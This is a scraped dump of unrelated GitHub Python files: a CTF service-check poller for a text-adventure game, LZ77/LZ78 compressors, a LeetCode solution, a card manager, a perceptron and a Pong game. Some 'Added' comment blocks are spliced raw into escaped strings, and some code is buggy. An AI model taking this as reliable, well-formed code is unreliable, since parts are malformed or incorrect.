b\" door\\n\")\n\t\telif b\"locked closed door\" in entry:\n\t\t\tdoortype = \"lock\"\n\t\telif b\"powered door\" in entry:\n\t\t\tdoortype = \"power\"\n\t\telif b\"teleporter\" in entry:\n\t\t\tdoortype = \"teleporter\"\n\n\t\tif doortype not in Directions:\n\t\t\tDirections[doortype] = []\n\t\tDirections[doortype].append(curdir)\n\treturn Directions\n\ndef GetItems(s):\n\ts.send(b\"look\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\n\tItems = []\n\tfor entry in data:\n\t\tif b\"large switch\" in entry:\n\t\t\tItems.append(\"switch\")\n\t\t\tif b\"off position\" in entry:\n\t\t\t\ts.send(b\"flip switch\\n\")\n\t\telif b\"steam punk\" in entry:\n\t\t\tItems.append(\"display\")\n\t\t\t#print(\"Found display\")\n\t\t\tif b\"dark screen\" in entry:\n\t\t\t\ts.send(b\"activate display\\n\")\n\n\treturn Items\n\ndef GetDisplayDetails(s):\n\t#s.send(b\"view display\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\tRooms = []\n\tfor entry in data:\n\t\tcurline = entry.split()\n\t\tif len(curline) < 2:\n\t\t\tcontinue\n\t\tif curline[0] == b\"Room\":\n\t\t\tRooms.append(curline[1])\n\n\treturn Rooms\n\ndef MoveDirection(s, Directions, RoomLocations):\n\tif len(RoomLocations) and \"teleporter\" in Directions:\n\t\ts.send(b\"touch \" + Directions[\"teleporter\"][0] + b\" teleporter keypad\\n\")\n\t\ts.send(random.choice(RoomLocations) + b\"\\n\")\n\t\ts.send(b\"activate \" + Directions[\"teleporter\"][0] + b\" 
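# --- Added sketch (not part of the original poller) ---
# GetData() above drains a socket with select(); roughly the same behaviour can
# be approximated with a recv timeout. Illustrative only, not a drop-in swap:
import socket

def recv_until_idle(sock, idle=0.5):
    sock.settimeout(idle)
    data = b""
    try:
        while True:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
    except socket.timeout:
        pass
    finally:
        sock.settimeout(None)
    return data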
teleporter\\n\")\n\t\tdata = GetData(s)\n\t\tif b\"bright yellow fluxuating liquid\" not in data:\n\t\t\teprint(\"failed to activate teleporter\")\n\t\t\treturn -1\n\t\ts.send(Directions[\"teleporter\"][0] + b\"\\n\")\n\t\t#print(\"used teleporter\")\n\telse:\n\t\tret = random.choice(Directions[\"room\"]) + b\"\\n\"\n\t\ts.send(ret)\n\tGetData(s)\n\treturn 0\n\ndef RunPoller(remote_ip, remote_port):\n\ts = socket.create_connection((remote_ip, remote_port))\n\n\t#make sure we got a response\n\tdata = GetData(s)\n\tif b\"Please provide your name:\" not in data:\n\t\teprint(\"Failed to get name\")\n\t\treturn -1\n\n\ts.send(GenRandomString(-1) + b\"\\n\")\n\tGetData(s)\n\n\t#attempt to create a page then validate it\n\ts.send(b\"in journal create page\\n\")\n\tGetData(s)\n\n\ts.send(b\"in journal on page 1 write\\n\")\n\tGetData(s)\n\n\trand_str = GenRandomString(250)\n\ts.send(rand_str + b\"\\n\\n\")\n\t#get the output\n\tdata = GetData(s)\n\n\t#read the page\n\ts.send(b\"in journal read page 1\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\tif len(data) != 3:\n\t\teprint(\"Failed to read journal page data\")\n\t\treturn -1\n\n\tif rand_str != data[1]:\n\t\teprint(f\"Journal page data did not match: {len(rand_str)} != {len(data[1])}\")\n\t\treturn -1\n\n\t#crumple and uncrumple a page\n\ts.send(b\"from journal take page 1\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\ts.send(b\"crumple page 1\\n\")\n\ts.send(b\"uncrumple page 1\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\t#page writing seems ok and not muddled, go validate wandering a bit\n\tRoomLocations = []\n\tfor i in range(0, 100):\n\t\tDirections = GetDirections(s)\n\t\tItems = GetItems(s)\n\t\tif \"display\" in Items:\n\t\t\tRoomLocations = GetDisplayDetails(s)\n\n\t\tif MoveDirection(s, Directions, RoomLocations) == -1:\n\t\t\teprint(\"Failed to move direction\")\n\t\t\treturn -1\n\n\treturn 0\n\nif __name__ == \"__main__\":\n\tHOST = os.environ[\"HOST\"]\n\tPORT = os.environ[\"PORT\"]\n\tSEED = os.environ[\"SEED\"]\n\trandom.seed(SEED)\n\teprint(\"HOST={}\".format(HOST))\n\teprint(\"PORT={}\".format(PORT))\n\teprint(\"SEED={}\".format(SEED))\n\n\tret = -1\n\ttry:\n\t\tret = RunPoller(HOST, PORT)\n\texcept BrokenPipeError as ex:\n\t\tret = -1\n\texcept ConnectionError as ex:\n\t\tret = -1\n\texcept Exception as ex:\n\t\timport traceback\n\t\ttraceback.print_exc()\n\t\tret = 1\n\n\tif ret == -1:\n\t\tprint(\"bad\")\n\telif ret == 0:\n\t\tprint(\"good\")\n\telse:\n\t\tprint(\"poller exception\")\n\n\tsys.exit(ret)","repo_name":"Nautilus-Institute/finals-2022","sub_path":"Perplexity/poller.py","file_name":"poller.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"31"} +{"seq_id":"24662620158","text":"# Find Maximum Number of String Pairs\n# You are given a 0-indexed array words consisting of distinct strings.\n\n# The string words[i] can be paired with the string words[j] if:\n\n# The string words[i] is equal to the reversed string of words[j].\n# 0 <= i < j < words.length.\n# Return the maximum number of pairs that can be formed from the array words.\n\n# Note that each string can belong in at most one pair.\n\ndef maximumNumberOfStringPairs(words):\n count = 0\n for i in range(len(words)):\n for j in range(i+1, len(words)):\n if words[j][::-1] == words[i]:\n count += 1\n return count\nprint(maximumNumberOfStringPairs( words = 
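# --- Added alternative (not in the original solution) ---
# Because the problem guarantees distinct words, a set of already-seen words
# reduces the quadratic scan above to a single pass:
def maximumNumberOfStringPairsFast(words):
    seen, count = set(), 0
    for w in words:
        if w[::-1] in seen:
            count += 1
        seen.add(w)
    return count

print(maximumNumberOfStringPairsFast(["cd", "ac", "dc", "ca", "zz"]))  # 2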
[\"aa\",\"ab\"]))","repo_name":"vibhatsu08/leetcode-python","sub_path":"findMaximumNumberOfStringPairs.py","file_name":"findMaximumNumberOfStringPairs.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41320254086","text":"def half_pyramid(n):\r\n str=\"\"\r\n for i in range(0,n):\r\n if(i= 0')\n\n if self._running:\n self.stop()\n\n self._running = True\n self._interval = interval\n if now:\n self._self_thread = hub.spawn_after(0, self)\n else:\n self._self_thread = hub.spawn_after(self._interval, self)\n\n def stop(self):\n \"\"\"Stop running scheduled function.\n \"\"\"\n self._running = False\n if self._self_thread is not None:\n self._self_thread.cancel()\n self._self_thread = None\n\n def reset(self):\n \"\"\"Skip the next iteration and reset timer.\n \"\"\"\n if self._self_thread is not None:\n # Cancel currently scheduled call\n self._self_thread.cancel()\n self._self_thread = None\n # Schedule a new call\n self._self_thread = hub.spawn_after(self._interval, self)\n","repo_name":"cloudysunny14/ryu_ldp_service","sub_path":"ryu/ryu/services/protocols/ldp/ldp_util.py","file_name":"ldp_util.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29838943950","text":"import os\n\n\nclass LZ77:\n\n def __init__(self, searchBuffSize, lookAheadBuffSize):\n self.searchBuffSize = searchBuffSize\n self.lookAheadBuffSize = lookAheadBuffSize\n pass\n\n def encodeFiles(self, filename):\n if not os.path.exists(filename):\n print(\"file\", filename, \"not exist!\")\n with open(filename, 'r', encoding='utf-8') as f:\n return self.encode(f.read())\n\n def calculateCodingRate(self, stringLength, numTuples, encoding='unicode'):\n \"\"\"\n if we use unicode:\n for input string:\n the input bits is 16 * length_of_input_string\n for output string:\n since the search_buffer_size and look_buffer_size can't be greater than 256\n in usual cases. 
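# --- Added worked check (not from the original class) ---
# Per the bit-count reasoning in this docstring: a tuple costs 8 + 8 + 16 = 32
# bits against 16 bits per input character, so rate = 32*T / (16*L) = 2*T / L.
def coding_rate_bits(num_tuples, input_len, tuple_bits=32, char_bits=16):
    return (tuple_bits * num_tuples) / float(char_bits * input_len)

assert coding_rate_bits(10, 40) == 2 * 10 / 40.0  # 0.5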
it require 8 bits to store 'o_i' and 'l_i' each\n for 'c_i', we assign 16 bits for unicode of c_i\n\n so it takes 8+8+16=32 bits for a tuple (o_i, l_i, c_i)\n\n so the coding rate = 2 * number_of_tuples / length_of_input_string\n :param stringLength:\n :param numTuples:\n :param codingMethod:\n :return: a float number representing coding rate\n \"\"\"\n\n if encoding == 'unicode':\n return 2 * numTuples / stringLength\n else:\n print(\"unknown coding method\")\n return 0\n\n\n def encode(self, input):\n \"\"\"\n :param input: should be a list containing characters\n :return: list of tuples\n i.e [(o_1, l_1, c_1), (o_2, l_2, c_2), ...., (o_n, l_n, c_n)]\n where 'o_i' is the offset, 'l_i' is the length of the match, and 'c_i' is the codeword corresponding to\n the symbol in the look-ahead buffer\n e.g:\n input = \"cabracadabrarrarrad\"\n codeword = [0, 0, 99, 0, 0, 97, 0, 0, 98, 0, 0, 114, 0, 0, 97, 0, 0, 99, 0, 0, 97, 0, 0, 100, 7, 4, 114, 3, 5, 100]\n \"\"\"\n codeword = []\n for i in range(min(self.searchBuffSize, len(input))):\n codeword.append((0, 0, ord(input[i])))\n if len(input) <= self.searchBuffSize:\n return codeword\n\n pt = self.searchBuffSize\n\n while pt < len(input):\n offset = self.searchBuffSize\n length = 0\n curOffset = self.searchBuffSize\n curLength = 0\n while curOffset > 0 and pt + curLength < len(input):\n search = input[pt - curOffset + curLength]\n lookAhead = input[pt + curLength]\n if search == lookAhead:\n curLength += 1\n else:\n if curLength > length:\n offset = curOffset\n length = curLength\n curOffset -= 1\n curLength = 0\n pt += length\n if pt == len(input):\n codeword.append((offset, length, 3)) # ASCII(^C) = 3, means end of file\n else:\n codeword.append((offset, length, ord(input[pt])))\n pt += 1\n\n codingRate = self.calculateCodingRate(len(input), len(codeword))\n\n return codeword, codingRate\n\n def decode(self, codeword):\n \"\"\"\n :param codeword: a 1-dimensional list of numbers, must be multiple of 3\n :return: a string containing the characters encoded\n\n e.g:\n codeword = [0, 0, 99, 0, 0, 97, 0, 0, 98, 0, 0, 114, 0, 0, 97, 0, 0, 99, 0, 0, 97, 0, 0, 100, 7, 4, 114, 3, 5, 100]\n output = \"cabracadabrarrarrad\"\n \"\"\"\n output = \"\"\n for tuple in codeword:\n o, l, c = tuple\n for j in range(l):\n output += output[-o]\n if c != 3:\n output += chr(c)\n return output\n\n\nclass LZ78:\n\n def __init__(self):\n pass\n\n def encodeFiles(self, filename):\n if not os.path.exists(filename):\n print(\"file\", filename, \"not exist!\")\n with open(filename, 'r', encoding='utf-8') as f:\n return self.encode(f.read())\n\n def calculateCodingRate(self, stringLength, numTuples, encoding='unicode'):\n \"\"\"\n if encoding is unicode:\n for input string:\n the input bits is 16 * length_of_input_string\n for output string:\n we assign 16 bits for o_i and 16 bits for c_i\n so it takes 16+16=32 bits for a tuple (o_i, c_i)\n\n so the coding rate = 2 * number_of_tuples / length_of_input_string\n\n :param stringLength:\n :param numTuples:\n :param encoding:\n :return:\n \"\"\"\n\n if encoding == 'unicode':\n return 2 * numTuples / stringLength\n else:\n print(\"unknown coding method\")\n return 0\n\n def encode(self, input):\n \"\"\"\n :param input: should be a list containing characters\n :return: a 1-dimensional list of numbers\n i.e [o_i, c_i]\n where 'o_i' is the offset, and 'c_i' is the last symbol of new entry\n e.g:\n input = \"cabracadabrarrarrad\"\n codeword = [0, 0, 99, 0, 0, 97, 0, 0, 98, 0, 0, 114, 0, 0, 97, 0, 0, 99, 0, 0, 97, 0, 0, 100, 7, 4, 114, 
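# --- Added round-trip demonstration (not in the original tests) ---
# Per the class docstrings above, decode(encode(s)) should restore the input:
lz = LZ77(7, 6)
cw, _rate = lz.encode("cabracadabrarrarrad")
assert lz.decode(cw) == "cabracadabrarrarrad"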
3, 5, 100]\n \"\"\"\n codeword = []\n entry = []\n i = 0\n while i < len(input):\n j = len(codeword) - 1\n while j >= 0:\n if i + len(entry[j]) < len(input) and entry[j] == input[i:i + len(entry[j])]:\n codeword.append([j + 1, ord(input[i + len(entry[j])])])\n entry.append(entry[j] + input[i + len(entry[j])])\n break\n j -= 1\n if j == -1:\n codeword.append([0, ord(input[i])])\n entry.append(input[i])\n i += 1\n else:\n i += len(entry[j]) + 1\n\n codingRate = self.calculateCodingRate(len(input), len(codeword))\n\n return codeword, codingRate\n\n def decode(self, codeword):\n output = \"\"\n entry = []\n for i in range(len(codeword)):\n j, c = codeword[i]\n c = chr(c)\n if j == 0:\n entry.append(c)\n output += c\n else:\n entry.append(entry[j - 1] + c)\n output += entry[j - 1] + c\n return output\n\n\nif __name__ == '__main__':\n\n# test1: test for basic function of LZ77\n print(\"==================test_case-1=====================\")\n\n input_string1 = \"cabracadabrarrarrad\"\n print(\"input string:\", input_string1)\n alg1 = LZ77(7, 6)\n print(\"test algorthm: LZ77(7, 6)\")\n codeword1, _ = alg1.encode(input_string1)\n print(\"codeword of input string: \", codeword1)\n decode_string1 = alg1.decode(codeword1)\n print(\"decode of codeword: \", decode_string1)\n\n# test2: test for basic function of LZ78\n print(\"==================test_case-2=====================\")\n\n input_string2 = \"wabba wabba wabba wabba woo woo woo\"\n print(\"input string:\", input_string2)\n alg2 = LZ78()\n print(\"test algorthm: LZ78\")\n codeword2, _ = alg2.encode(input_string2)\n print(\"codeword of input string: \", codeword2)\n decode_string2 = alg2.decode(codeword2)\n print(\"decode of codeword: \", decode_string2)\n\n# test3: test for coding rate of LZ77 and LZ78\n print(\"==================test_case-3=====================\")\n input_path = \"testfile.txt\"\n f = open(input_path, 'r', encoding='utf-8')\n input_string3 = f.read()\n print(\"total number of characters: \", len(input_string3))\n\n alg3 = LZ77(255, 8)\n\n _, rate2 = alg2.encode(input_string3)\n _, rate3 = alg3.encode(input_string3)\n\n print(\"-----coding-rate(unicode)--------\")\n print(\"|LZ77|%4f|\" % rate3)\n print(\"|LZ78|%4f|\" % rate2)\n\n print('==================finished=========================')\n\n","repo_name":"zixuan-chen/Lempel-Ziv","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1954950191","text":"L = ['POON', 'PLEE', 'SAME', 'POIE', 'PLEA', 'PLIE', 'POIN']\nStart = 'TOON'\nEnd = 'PLEA'\ncount = 0\n\nfor l in L:\n if Start == End:\n print(\"Successful in {} attempts\".format(count))\n exit(0)\n else:\n Start = l\n count+=1","repo_name":"Rinki8890/PythonTrial","sub_path":"WordLadderITr.py","file_name":"WordLadderITr.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28598367055","text":"adminAccount = \"123456\"\nadminPwd = \"123456\"\nlist = []\n\n#新增\ndef add():\t\n\tdic = {}\n\tname = input(\"请输入姓名\")\n\tage = input(\"请输入年龄\")\n\tsex = input(\"请输入性别\")\n\tjob = input(\"请输入工作\")\n\tloction = input(\"请输入地址\")\n\tdic[\"name\"] = name\n\tdic[\"age\"] = age\n\tdic[\"sex\"] = sex \n\tdic[\"job\"] = job\n\tdic[\"loction\"] = loction \n\tlist.append(dic)\n\n#删除\ndef remove():\n\tname = input(\"请输入您要删除的名字\")\t\n\tfor i in range(0,len(list)):\n\t\tif list[i] [\"name\"] == 
name:\n\t\t\tlist.pop(i)\n\t\t\tbreak\n\n\n\n#修改\ndef change():\n\tname = input(\"请输入你要修改的名字\")\n\tisShow = True\n\tfor i in range(0,len(list)):\n\t\tif list[i][\"name\"] == name:\n\t\t\tchangeContent(i)\n\t\t\tisShow = False\n\t\t\tbreak\n\telse:\n\t\tif isShow:\n\t\t\tprint(\"你输入的人不存在\")\n\n\n\ndef changeContent(position):\n\tisloop = True\n\twhile isloop:\n\t\tmode = int(input(\" 请输入要输入的信息: 1.名字 2.年龄 3.性别 4.工作 5.地址 6.退出\"))\n\t\t\n\t\tif mode == 1:\n\t\t\tname = input(\"请输入新的名字\")\n\t\t\tlist[position][\"name\"] = name\n\t\telif mode == 2:\n\t\t\tage = input(\"请输入新的年龄\")\n\t\t\tlist[position][\"age\"] = age\n\t\telif mode == 3:\n\t\t\tsex = input(\"请输入新的性别\")\n\t\t\tlist[position][\"sex\"] = sex\n\t\telif mode == 4:\n\t\t\tjob = input(\"请输入新的工作\")\n\t\t\tlist[position][\"job\"] = job\n\t\telif mode == 5:\n\t\t\tloction = input(\"请输入新的地址\")\n\t\t\tlist[position][\"loction\"] = loction\n\t\telif mode == 6:\n\t\t\tisloop = False\n\n\n#查询\ndef find():\n\tfor i in list:\n\t\tprint(i)\n\n\n\ndef showMenu():\n\twhile True:\n\t\tprint(\"欢迎进入名片管理系统\".center(30,\"*\"))\n\t\tprint(\"1. 新增名片\".center(30,\"-\"))\n\t\tprint(\"2. 查询名片\".center(30,\"-\"))\n\t\tprint(\"3. 修改名片\".center(30,\"-\"))\n\t\tprint(\"4. 删除名片\".center(30,\"-\"))\n\t\tprint(\"5. 退 出\".center(30,\"-\"))\n\t\tmode = int(input(\"请选择功能序号\"))\n\t\tif mode == 1:\n\t\t\tadd()\n\t\telif mode == 2:\n\t\t\tfind()\n\t\telif mode == 3:\n\t\t\tchange()\n\t\telif mode == 4:\n\t\t\tremove()\n\t\telif mode == 5:\n\t\t\tbreak\n\n\n\ndef adminLogin():\n\taccount = input(\"请输入管理员帐号:\")\n\tpwd = input(\"请输入管理员密码:\")\n\t\n\t\n\tif account != adminAccount or pwd != adminPwd:\n\t\tprint(\"账户或密码错误\")\n\t\n\telif account == adminAccount and pwd == adminPwd:\n\t\tprint(\"管理登录成功\")\n\t\tshowMenu()\n\n\n\nadminLogin() \n\n\n\n","repo_name":"dudengjin/python","sub_path":"名片管理1.py","file_name":"名片管理1.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35731001591","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef vectorxvector(v,y):\n\ts = 0\n\tfor n in xrange(len(v)):\n\t\ts += v[n] * y[n]\n\treturn s\n\t\ndef vectorxconstant(v,a):\n\treturn [x*a for x in v]\n\ndef vectordifference(v,y):\n\treturn [v[n]-y[n] for n in xrange(len(v))]\n\ndef vectorsum(v,y):\n\treturn [v[n]+y[n] for n in xrange(len(v))]\t\n\ndef classify(learnSamples,recognizementSample,b=0.00001,alpha=0.00001,maxLimit=1000):\n\tm = 0;\n\tc = 0;\n\tweightVectors = []\n\tfor i in xrange(2): weightVectors.append([0 for x in xrange(len(learnSamples[0]))])\n\twhile(m g):\n\t\t\t\t\t\tweightVectors[j] = vectordifference(weightVectors[j],vectorxconstant(learnSamples[n][0],alpha))\n\t\t\t\t\t\terror = True\n\t\t\tif error: weightVectors[i] = vectorsum(weightVectors[i],vectorxconstant(learnSamples[n][0],alpha))\n\t\t\telse: m += 1\t\n\trecognizeds = []\n\tmaxim,i = -float('inf'),0\n\tfor iv in xrange(len(weightVectors)):\n\t\tprod = vectorxvector(weightVectors[iv],recognizementSample)\n\t\tif prod > maxim:\n\t\t\tmaxim = prod\n\t\t\ti = iv\n\tif i==0: i=-1\n\treturn i\n\t\ndef __str__(): return \"Perceptron classifier\"\n\n\"\"\"if __name__ == '__main__':\n\tlearnSamples = [([1,1],-1),([2,2],1),([0.5,0.7],1)]\n\trecognizementSample = [-5,-7]\n\tprint classify(learnSamples,recognizementSample)\n\t#recognizeds = 
perceptron_recognizement()\t\t\n\t#plotSamplesRecognizeds(recognizeds)\n\"\"\"\n","repo_name":"jogonba2/AdaBoost","sub_path":"Classifiers/Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"34268142100","text":"import pygame\nimport random\n\npygame.init()\n\nelementPair = 1\nchoice = int(input(\"Enter your choice: 1 for Smash and Flash and 2 for Ball Clone\"))\n\nif choice == 1:\n elementPair = 1\nelif choice == 2:\n elementPair = 2\n\n#Initial window\nWIDTH, HEIGHT = 1000, 600\nwindow = pygame.display.set_mode((WIDTH, HEIGHT))\n#Change the pygame window name\npygame.display.set_caption(\"Pongg\")\nrun = True \n\n#Player Score Variable\nplayerOne = 0\nplayerTwo = 0\n\n#Ball Direction\ndirection = [0,1]\n#Ball Angles \nangles = [0,1,2]\n#Ball Color\nWHITE = (255,255,255)\n#Ball ReDraw\nBLACK = (0,0,0)\n#Smash Element Indicator\nRED = (255,0,0)\n#Ball Position on window\nradius = 15\nball_x = WIDTH/2 - radius\nball_y = HEIGHT/2 - radius\n#Ball Movement\nballVelocityX = 1\nballVelocityY = 1\n#Cloning Ball Postion and Movement\ncloneBall_x = WIDTH/2 - radius\ncloneBall_y = HEIGHT/2 - radius\ncloneBallVelocityX = 1\ncloneBallVelocityY = 1\n\n#Paddle Positions and Dimensions \npaddleWidth = 20\npaddleHeight = 120\n#Left Paddle\nleftPaddleX = 100 - paddleWidth/2\nleftPaddleY = HEIGHT/2 - paddleHeight/2\n#Right Paddle\nrightPaddleX = WIDTH - (100 - paddleWidth/2)\nrightPaddleY = HEIGHT/2 - paddleHeight/2\n#Paddle Velocity\nrightPaddleVelocity = 0\nleftPaddleVelocity = 0\n\n#Smash Element Variables\nleftSmashElement = 0\nrightSmashElement = 0\nleftSmashElementRemaining = 3\nrightSmashElementRemaining = 3\n\n#Flash Element Variables\nleftFlashElement = 0\nrightFlashElement = 0\nleftFlashElementRemaining = 3\nrightFlashElementRemaining = 3\n\n#Clone Element Variable\nleftCloneElement = 0\nrightCloneElement = 0\nleftCloneElementRemaining = 3\nrightCloneElementRemaining = 3\n\nwhile run: \n #Make the ball look like it is moving by removing the previous position and redrawing the new position\n window.fill(BLACK)\n #This stores all the events that the user inputs - example is the quite but \n #Code below is main loop\n for i in pygame.event.get():\n print (i)\n if i.type == pygame.QUIT:\n run = False\n #Check keystrokes\n #Right paddles\n elif i.type == pygame.KEYDOWN:\n if i.key == pygame.K_UP:\n rightPaddleVelocity = -4\n if i.key == pygame.K_DOWN:\n rightPaddleVelocity = 4\n #Smash Element Activation\n if i.key == pygame.K_RIGHT and rightSmashElementRemaining > 0:\n rightSmashElement = 1\n #Flash Element Activation Right Paddle\n # \n if i.key == pygame.K_RIGHT and rightFlashElementRemaining > 0:\n rightFlashElement = 1\n #\n #Left Paddle\n if i.key == pygame.K_w:\n leftPaddleVelocity = -4\n if i.key == pygame.K_s:\n leftPaddleVelocity = 4\n #Smash Element Activiation\n if i.key == pygame.K_d and leftSmashElementRemaining > 0:\n leftSmashElement = 1\n #Flash Element Activation Left Paddle\n #\n if i.key == pygame.K_a and leftFlashElementRemaining > 0:\n leftFlashElement = 1\n #\n \n if i.type == pygame.KEYUP:\n rightPaddleVelocity = 0\n leftPaddleVelocity = 0\n\n \n #Ball movement controls\n #Create conditionals to check it the balls position is at y=0 or y=600\n if ball_y <= 0 + radius or ball_y >= HEIGHT - radius:\n ballVelocityY *= -1\n if cloneBall_y <= 0 + radius or cloneBall_y >= HEIGHT - radius:\n cloneBallVelocityY *= -1\n #Player turns\n if ball_x >= 
WIDTH - radius:\n #If the ball goes off the screen from the right\n #hand side the player on the left gets the point\n playerOne += 1\n ball_x = WIDTH/2 - radius\n ball_y = HEIGHT/2 - radius\n #Retrieve the position for the cloned ball\n cloneBall_x = WIDTH/2 - radius\n cloneBall_y = HEIGHT/2 - radius\n randomDirection = random.choice(direction)\n randomAngles = random.choice(angles)\n #Up Direction\n if randomDirection == 0:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = -1.4\n # Clone Ball Directions\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = -1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = -0.7\n # Clone Ball Direction\n cloneBallVelocityX = 0.7\n cloneBallallVelocityY = -0.7\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = -0.7\n # Clone Ball Direction\n cloneBallVelocityX = 1.4\n cloneBallallVelocityY = -0.7\n #Down Direction\n if randomDirection == 1:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = 1.4\n # Clone Ball Direction\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = 0.7\n # Clone Ball Direction\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 0.7\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = 0.7\n # Clone Ball Direction\n cloneBallVelocityX = 1.4\n cloneBallVelocityY = 0.7\n ballVelocityX *= -1\n # Change the direction of the clone ball\n cloneBallVelocityX *= -1\n\n if ball_x <= 0 + radius:\n #Ball goes off the screen on the left hand side the player on the \n #right hand side gets the points\n playerTwo += 1\n ball_x = WIDTH/2 - radius\n ball_y = HEIGHT/2 - radius\n #Clone Ball\n cloneBall_x = WIDTH/2 - radius\n cloneBall_y = HEIGHT/2 - radius\n randomDirection = random.choice(direction)\n randomAngles = random.choice(angles)\n #Up Direction\n if randomDirection == 0:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = -1.4\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = -1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = -1\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = -1\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = -0.7\n #Clone\n cloneBallVelocityX = 1.4\n cloneBallVelocityY = -0.7\n #Down Direction\n if randomDirection == 1:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = 1.4\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = 0.7\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 0.7\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = 0.7\n #Clone\n cloneBallVelocityX = 1.4\n cloneBallVelocityY = 0.7\n #Paddle Movement Controls\n if leftPaddleY >= HEIGHT - paddleHeight:\n leftPaddleY = HEIGHT - paddleHeight\n if leftPaddleY <= 0:\n leftPaddleY = 0\n if rightPaddleY >= HEIGHT - paddleHeight:\n rightPaddleY = HEIGHT - paddleHeight\n if rightPaddleY <= 0:\n rightPaddleY = 0\n \n #Left Paddle Collision\n if leftPaddleX <= ball_x <= leftPaddleX + paddleWidth:\n if leftPaddleY <= ball_y <= leftPaddleY + paddleHeight:\n ball_x = leftPaddleX + paddleWidth\n cloneBall_x = leftPaddleX + paddleWidth\n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n\n #Right Paddle Collision\n if rightPaddleX <= ball_x <= rightPaddleX + paddleWidth:\n if rightPaddleY <= ball_y <= rightPaddleY + paddleHeight:\n ball_x = rightPaddleX\n cloneBall_x = rightPaddleX \n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n \n #Smash Element Active For Left Paddle\n if 
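# --- Added helper sketch (not in the original game) ---
# The paddle tests repeated above are all the same point-in-rectangle check,
# which could be factored out like this:
def ball_on_paddle(bx, by, px, py, pw, ph):
    return px <= bx <= px + pw and py <= by <= py + ph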
leftSmashElement == 1:\n if leftPaddleX <= ball_x <= leftPaddleX + paddleWidth:\n if leftPaddleY <= ball_y <= leftPaddleY + paddleHeight:\n ball_x = leftPaddleX + paddleWidth\n ballVelocityX *= -3.5\n cloneBallVelocityX *= -3.5\n leftSmashElement = 0\n leftSmashElementRemaining -= 1\n #Flash Element Active For Left Paddle\n if leftFlashElement == 1:\n leftPaddleY = ball_y - paddleHeight // 2\n leftFlashElement = 0\n leftFlashElementRemaining -= 1\n #\n #\n\n #Smash Element Active For Right Paddle \n if elementPair == 1:\n if rightSmashElement == 1:\n if rightPaddleX <= ball_x <= rightPaddleX + paddleWidth:\n if rightPaddleY <= ball_y <= rightPaddleY + paddleHeight:\n ball_x = rightPaddleX \n ballVelocityX *= -3.5\n cloneBallVelocityX *= -3.5\n rightSmashElement = 0\n leftSmashElementRemaining -= 1\n #Flash Element Active For Right Paddle\n if rightFlashElement == 1:\n leftPaddleY = ball_y - paddleHeight // 2\n rightFlashElement = 0\n rightFlashElementRemaining -= 1\n #\n #\n #\n elif elementPair == 2:\n if leftCloneElement == 1: \n if leftPaddleX <= ball_x <= leftPaddleX + paddleWidth:\n if leftPaddleY <= ball_y <= leftPaddleY + paddleHeight:\n ball_x = leftPaddleX + paddleWidth\n loneBall_x = leftPaddleX + paddleWidth\n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n cloneBallVelocityY *= -1\n leftCloneElement = 0\n leftCloneElementRemaining -= 1\n\n if rightCloneElement == 1:\n if rightPaddleX <= ball_x <= rightPaddleX + paddleWidth:\n if rightPaddleY <= ball_y <= rightPaddleY + paddleHeight:\n ball_x = rightPaddleX\n cloneBall_x = rightPaddleX \n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n cloneBallVelocityY *= -1\n rightCloneElement = 0\n rightCloneElementRemaining -= 1\n\n\n #Movement Section\n ball_x += ballVelocityX\n ball_y += ballVelocityY\n cloneBall_x += cloneBallVelocityX\n cloneBall_y += cloneBallVelocityY\n rightPaddleY += rightPaddleVelocity\n leftPaddleY += leftPaddleVelocity\n\n #Scoreboard\n font = pygame.font.SysFont('callibri', 32)\n scoreOne = font.render(\"Player One: \" + str(playerOne), True, WHITE)\n window.blit(scoreOne, 